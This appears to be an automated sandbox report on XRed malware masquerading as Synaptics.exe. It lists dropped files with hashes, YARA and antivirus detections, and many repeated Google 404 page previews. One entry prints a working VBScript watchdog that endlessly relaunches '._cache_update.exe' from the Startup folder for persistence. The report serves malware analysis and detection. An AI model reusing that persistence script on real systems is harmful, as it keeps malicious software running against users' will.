                                                                                                                                                      SSDEEP:24576:8nsJ39LyjbJkQFMhmC+6GD9bhloDX0XOf44e7JFtxAnWe2fxYBQl:8nsHyjtk2MYC5GDxhloJfXnWbfxp
                                                                                                                                                      MD5:290A46D2614F4CE4F7AD75D2CEA2CE23
                                                                                                                                                      SHA1:CC9F762B21F649252881087B2FF56E88D4B5A6F1
                                                                                                                                                      SHA-256:7CBE965FA1278BA09C31E191C19AC1E2B52F940B656273872C805833AE03E276
                                                                                                                                                      SHA-512:2A6D87585971CF166D4DF1B2BCFE80A8B066D1CF4CBF646ADDF0735B62644AB5D9624B635AA1BA89B0B36107FD2899BEC2F95D6A55D2FAFF579272E1E758FE98
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                      Joe Sandbox View:
• Filename: JPS.exe, Detection: malicious
                                                                                                                                                      Process:C:\Windows\System32\wscript.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1989120
                                                                                                                                                      Entropy (8bit):6.934025794433937
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:8nsJ39LyjbJkQFMhmC+6GD9bhloDX0XOf44e7JFtxAnWe2fxYBQl:8nsHyjtk2MYC5GDxhloJfXnWbfxp
                                                                                                                                                      MD5:290A46D2614F4CE4F7AD75D2CEA2CE23
                                                                                                                                                      SHA1:CC9F762B21F649252881087B2FF56E88D4B5A6F1
                                                                                                                                                      SHA-256:7CBE965FA1278BA09C31E191C19AC1E2B52F940B656273872C805833AE03E276
                                                                                                                                                      SHA-512:2A6D87585971CF166D4DF1B2BCFE80A8B066D1CF4CBF646ADDF0735B62644AB5D9624B635AA1BA89B0B36107FD2899BEC2F95D6A55D2FAFF579272E1E758FE98
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe, Author: Joe Security
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                      Joe Sandbox View:
• Filename: JPS.exe, Detection: malicious
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.261723765688538
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0ASU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+j+pAZewRDK4mW
                                                                                                                                                      MD5:13E32C33D9B5ED9D2E0AF2B57D7A398B
                                                                                                                                                      SHA1:789863C3034140DA1D6C210282E8FC9EBB932FEB
                                                                                                                                                      SHA-256:6B8D418AEEC80B5089F9DEF9C2321157BD1E38B5E838D5946586140923C4742A
                                                                                                                                                      SHA-512:BFF596E197C28F2D71A4AD72687E9573208F393F7F1F7C2507ED07E4E046205D066D3BA4A9CB47CF35D0EB6CCCA19ADB4A68C84BAA7955743DB868A5161DD977
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MzmVsB1_2Q3KgKMVgcriNQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.255874357955027
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+081SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+X1+pAZewRDK4mW
                                                                                                                                                      MD5:5871D9820D49F3A821C80FA4EF7B9DD3
                                                                                                                                                      SHA1:1535A292E373CCEEA9677815C83008FE86E66729
                                                                                                                                                      SHA-256:91FF9EF071AE0903CCA1F7A1104BC3F58CAC403FCC5838E685FF64AF0275C757
                                                                                                                                                      SHA-512:9DB8B0C3DC79177CF346FC83C7A76B07E24559063A49D7D6B7310138339BEF94DA935F4BFA163178BC06B6977F7395F21A467FE46CA6DA89B8F09897B5F6D13E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2599240442611555
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0YSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                                                                                      MD5:01D6B8814881975B0F972F50952329A2
                                                                                                                                                      SHA1:F93AF56C7794C4A4F5EDAD2213303AC189C9B363
                                                                                                                                                      SHA-256:D9824A37932ABD27B1003AF826BFA9B78E8F6F846814EAFCC5012B30A4C7161D
                                                                                                                                                      SHA-512:C7CE34BED90EF81BE919FB506FF61AA072ED1837269EF14449CDA628BA7420289D9C95AF625916889D50AEB80971418E59CAB137408E5203566F6817345575BA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2665907764262645
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0eXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+/X+pAZewRDK4mW
                                                                                                                                                      MD5:573231530FD1627E94DD75A7469E099C
                                                                                                                                                      SHA1:68951118BE2E287D04B91B56B57EAD7643300A7E
                                                                                                                                                      SHA-256:983F6AEF9C818C44A6793E30F5D61D2E936EA86177C0CBDE299E100F52A1512A
                                                                                                                                                      SHA-512:6C51BEC7C725A245890DA7FA00CF0B4360811A145F1CFF5F30724371FB38B0549B8B72CCA164711235FC0C15C910BFDB59968803AE2FA54507D866A6C7B2D8AA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.265789536587981
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0sgrSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+I+pAZewRDK4mW
                                                                                                                                                      MD5:12A13F048241DF5D80B0EF8C6E71D16A
                                                                                                                                                      SHA1:5018E5DC52734A70AD223B9D804C4F7FB39BDA1B
                                                                                                                                                      SHA-256:395BECE8954C4962B0C4450595EDFBC26C3E31A5E2A19BB51195C91683D04D4A
                                                                                                                                                      SHA-512:45523E4D56CE7A379E19928AF754140429D4E351A6E762B243501E3E235468480917BB8A86AAC426479101C7419F6DAB09C203A048F49B0B881568852FB76FBA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.273602629902625
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0FxDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+k+pAZewRDK4mW
                                                                                                                                                      MD5:296595562583320C4764F8B7BA5553FC
                                                                                                                                                      SHA1:88ACEF17D044D22863A039E599FB6992A439966B
                                                                                                                                                      SHA-256:206E8B6FF2A5CC5999172117579D2714222FA8B504DA9D7805B96A8DB36AE6FA
                                                                                                                                                      SHA-512:1EA4A1F9C1D1B9209382B99AB5396453F5CEF8D03902CF25CC500FF8C9A98B5E72ADD180E981D389286D9DEB354288E89074D35FB42BB4E8B4F5BD47C113BD4D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2564374179301945
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0xdSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Cd+pAZewRDK4mW
                                                                                                                                                      MD5:316B25EA4E9C42F48F5D2E662E7695DE
                                                                                                                                                      SHA1:C070BC22FA4570662D33A4829AF3F346F8A7ECD1
                                                                                                                                                      SHA-256:78100AE38B22EBC8267E27FE8AC6553E1911E9B01BC457974AD67820385E11CC
                                                                                                                                                      SHA-512:26CF998443073090E666ED934B44B2206127B05B6AC8DA66A8682AC528742359A27B64E6EDA70D9C43CBFD3C1DFEA1F68A2575D29F78767F8D2A011FDE8BB0AD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.262947916079587
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+02SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+t+pAZewRDK4mW
                                                                                                                                                      MD5:ACF77909DBC4BC9AC2C0190E4466320B
                                                                                                                                                      SHA1:C1E96AF56380A2B9A1A26FA77A01756BC278F0FD
                                                                                                                                                      SHA-256:A6B1C01651F1218131607E4E15CBB5E3283D5D2C64E4831F59D0FD776E01E6E5
                                                                                                                                                      SHA-512:C8D61B1769E64CDB5B5D06C57EE21F17E1F2E24383F1156C71B2090530B91798954321BC2775F6DE8569991C02C5010A17469F5A35D7B64C5ED8275748990067
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.251033281055357
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0kPFSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+/F+pAZewRDK4mW
                                                                                                                                                      MD5:C6A75848CA11409961FB79C73D698E00
                                                                                                                                                      SHA1:24C85C17E4C9146CFB82A0DE8D0E8FBA37F920B1
                                                                                                                                                      SHA-256:BED946636F47173E94E506F8201F7491E9CF76CA6638EE263F3D78785443868B
                                                                                                                                                      SHA-512:F8799E4EC76BADA9410367E150710FB311CACF2610C19C79343058F18CEED27A59C96627096C16689021ED28213AC16D55C182F4103666247F520E4363E1C50E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.273840798975782
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0EW5SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+NW5+pAZewRDK4mW
                                                                                                                                                      MD5:ABD3F9340E71188BB9E6438A0BDB3700
                                                                                                                                                      SHA1:B2979DEB04132784C5D2F823E627C59BE276CB8F
                                                                                                                                                      SHA-256:0E16D41E5C21A4EA4B9608AD8493A20D322BB3A5D4749F85EC672B85D60CB775
                                                                                                                                                      SHA-512:2CC2149322D4200931383215AEC3312D5413FC9EA467F6F316CADB3D1CAF1ACBAEBA2D2A042049DCDFA0B000D3EF75A894AB3C33548090298D1DA556D63CCBC4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2781505363643175
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0mSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5+pAZewRDK4mW
                                                                                                                                                      MD5:92BC7FA8918E7D2FD1F2F2316D460C6A
                                                                                                                                                      SHA1:003B0E28436D5DD0E07C69CD7BD2940207F334B9
                                                                                                                                                      SHA-256:051B040EDAE8FC8510794C856464992EF12AB7E2AC3153221DFEE1D4D93FD658
                                                                                                                                                      SHA-512:A8703F1C3218DDCF4B352CFECF21745CAFD7C0C86003DDBDDA938F54DAD237F4298B376A1D01E0E89FB96D90D3DCF63331BBE75199B47E278ECB54EDB819AB76
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.257646528436729
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+08rSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Hr+pAZewRDK4mW
                                                                                                                                                      MD5:2B1F7D2585DA9C9AD1F14059CDB53F8A
                                                                                                                                                      SHA1:09A0706DB69B038A5F34FEB063D1E70DAFCF62C5
                                                                                                                                                      SHA-256:3E72C09E8029C0BBABF8DFE59C43FBADBC67D1AFDE2B9E576C8E1DFF91521D78
                                                                                                                                                      SHA-512:F748D3D9C00DD0568CE8E86A1A49AB3CDF63A906C2D8D4B65E403AF8B5F63783381A1738062EDDC8D4463F53343360FC57E456FED4F983451213DACCAB1B829E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.268651649040539
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0cUSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+VU+pAZewRDK4mW
                                                                                                                                                      MD5:93B6F29FFF825A0D5B46C1AF6BE55C40
                                                                                                                                                      SHA1:D1562D25FE9D07C56CCAF078064512FD82C560E0
                                                                                                                                                      SHA-256:AEAFD2DCAF3F6DBF3B1D576D3336204847A556E97B290941A8CC9ED8B63BA3FE
                                                                                                                                                      SHA-512:F5E9A7515289CA9F36C577F7656C72F9D08D80AC665BA30C74CBE79FA4DB4BD163CAFE4F667876F5EFA21A63C0EB38E642F1A59CCF8162AC3CC59DD666022050
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):895
                                                                                                                                                      Entropy (8bit):5.347597076563469
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:dF/UFH/uVMHiU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UFH/ucXt+G+7xLxe0WABNVIqZaVzgA
                                                                                                                                                      MD5:7BB58FF78D75879AE06480639AB73331
                                                                                                                                                      SHA1:43D51FF2EF0250C7C9405E4FA66E9C7DC6C6F939
                                                                                                                                                      SHA-256:EDD007E84A2C981F90A34E3EE48A9721A3D296DE2FBAD9134616D99A58E852C0
                                                                                                                                                      SHA-512:2A9794B3FC7864D57965C963E438180B8555B1505F4B10F489E4E8CB09A20504A196E0A1FBEDDD133BCAED8DAFADC57C39E93ECEED2153E724B9E3EF3B032CCC
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, Author: Joe Security
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_update.exe"..fileset = """C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.280951993189178
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0mbTISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+x8+pAZewRDK4mW
                                                                                                                                                      MD5:685F906D4982428084D0C0AA4C8D7F58
                                                                                                                                                      SHA1:F88C63C58010E27A9E21F74AE6D7AC1E5CCBD04C
                                                                                                                                                      SHA-256:F079991EBB7F047A57956D39D8A5CB648EE94836536A50A993F59C4A490B89A2
                                                                                                                                                      SHA-512:B1AFAA4078D2BAABE69637CD61C9B42769C39731D2D3C602D35E3534DD3B74EFF9C5D5A17558D2DB91C30D86BC679B0C7FD2B9A356483982ADD933367D8A8BEB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.262349978210253
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0fSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c+pAZewRDK4mW
                                                                                                                                                      MD5:EDA7E10E91357673262997692BB803A2
                                                                                                                                                      SHA1:F7C797809CE75BF8CD44A853E8115DED6E1EAABF
                                                                                                                                                      SHA-256:B6B6F5A1F6722291B6D197940A734A7156FCE2D0C9370F870C68A232CD569818
                                                                                                                                                      SHA-512:263620CB421FD71CF720F37CEFDEFB810FDC415BA87F7F769EF7DD2774BFFF68FE0D5D8BE015C23339FAD4DF8B21E4B5AF2EA2447146D02028843349C43AC655
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2527910785737655
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0L1gSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+ug+pAZewRDK4mW
                                                                                                                                                      MD5:2C9AD2C7148528384BFF717A972CA3BE
                                                                                                                                                      SHA1:F9CEC866F36FE672D14B771388E5620826F08BCC
                                                                                                                                                      SHA-256:F87BB41F235FC562A57C0F2A2F4788B7A2D3085653AFF7EC057660DFE328B5B0
                                                                                                                                                      SHA-512:E985210FEC0BDA56D2E0B59130FF1328F20C184A9DFAB253216D2EAC06DD41C1A3E13CB11E31C6D01451FF007B98201B3D88E9AB33F47A007D6D31FBC54A816D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.267275139829966
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0Ya8SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+l+pAZewRDK4mW
                                                                                                                                                      MD5:0A2906210742E8799DE80BCF2C534AF0
                                                                                                                                                      SHA1:5D1081E8D98F92EDFF5156EF4E5F60141F90538B
                                                                                                                                                      SHA-256:913FE74747239CA31BA0E9C24EAA1B3CAFBAC02389733904CB217532B3B341CE
                                                                                                                                                      SHA-512:8CBB0E5528FF80EC5DE9A029CE03AE017F6EAAABC66D6FF629D3FA4F1DA2E5F704F27466ACE875D84C6F6AD14BC01B0D833C42AADAC1667350194C924E2E90C9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.261259934587398
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0uSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5+pAZewRDK4mW
                                                                                                                                                      MD5:A5DD7F05D84E441C3F7D50B627406548
                                                                                                                                                      SHA1:CB3A9A38EFFF5BF17836D30F57FA3C68014BD5D3
                                                                                                                                                      SHA-256:8E71066E6BB423A6ADEEA24C7025540663FA1E045BC87E4DBA2912B0F868845A
                                                                                                                                                      SHA-512:5153C1E049E01D30827F7622856696571ED1E6D6033025E24D637FC70FC4977E5C6769F8CB7E07AD74317D81B411DE9CF99D0DF9B3F604F7131B00391688C574
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.264824714831566
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0Q1vaSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+51va+pAZewRDK4mW
                                                                                                                                                      MD5:DE8F68BE681074811DE2A57BB920EF10
                                                                                                                                                      SHA1:6DB059E3180253D071B74094DC3D4428EFD90F04
                                                                                                                                                      SHA-256:7463BF3C21AFAF9F70A8AF362B4F6834F4FC4308970BDC80CB139CC47B50DB30
                                                                                                                                                      SHA-512:562BC53CE8F5DAA4E7073E17D6CFA52AEF20E3781FC24D1AEE7AA8BDBE30A82711E22B31CCA81A739C5D485BA16D7E6BC2DF5E1CCE9429C723058554948A5552
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.261610230085772
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0rCSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+d+pAZewRDK4mW
                                                                                                                                                      MD5:44BAB6C3E933860CCCDC94FCF2944EBC
                                                                                                                                                      SHA1:A395EF1FD8DD46AD96A4481741F147DFA8C3685C
                                                                                                                                                      SHA-256:9B5D8494EA53503F829AA4F093C9AD492450B52E2A716A1A35BF0BE05F36D76C
                                                                                                                                                      SHA-512:773A36BEE8DF46506D643A01B2E4E1D4571C828C85CE39F65D1B3F4607AA85FB0B8EE50C4D9D49DD7F325063915B9F59FB8BFCEDB134D7EC74D4220695BEB94B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.261492426839114
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0cTDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+PTD+pAZewRDK4mW
                                                                                                                                                      MD5:5B923172366E6A38665628684BE08EA7
                                                                                                                                                      SHA1:D32A72D28A3DD6E8EA7296A280043E2FAB091AA0
                                                                                                                                                      SHA-256:3D1EC32E9AB8FF725A748B76EC80018E75A825849073F24272C06ADCB0171BC1
                                                                                                                                                      SHA-512:EDD4BCF66C2341EBE5F8157436C2781604A2DA2EEA2904A375E7B90DDFD1512A7BE19D177A866C9D7D92A1881A80E38B79D5DCEF299CEC8A38BACB666296D879
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.259361967915171
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+08MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+tM+pAZewRDK4mW
                                                                                                                                                      MD5:B42FB950218B0DE3AC5BAB16F3CDD003
                                                                                                                                                      SHA1:D70252D83DE764D5343CB5C7C569A21F14E9008E
                                                                                                                                                      SHA-256:41EB0ED7F1F417DE64DE3738A80154CC4E44F0A6364941772F5212E167A6083E
                                                                                                                                                      SHA-512:A49F19510955407DFE91126C27637F98F0C51D47B25C8E458D88E9FC69272EC7344684FC7D219C568DBD4107EBFB8AA7FDE82D920DB0225D34BF87E5B655B68A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.264537047499486
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+I+pAZewRDK4mW
                                                                                                                                                      MD5:939A118F54551C28526068B285BB33BE
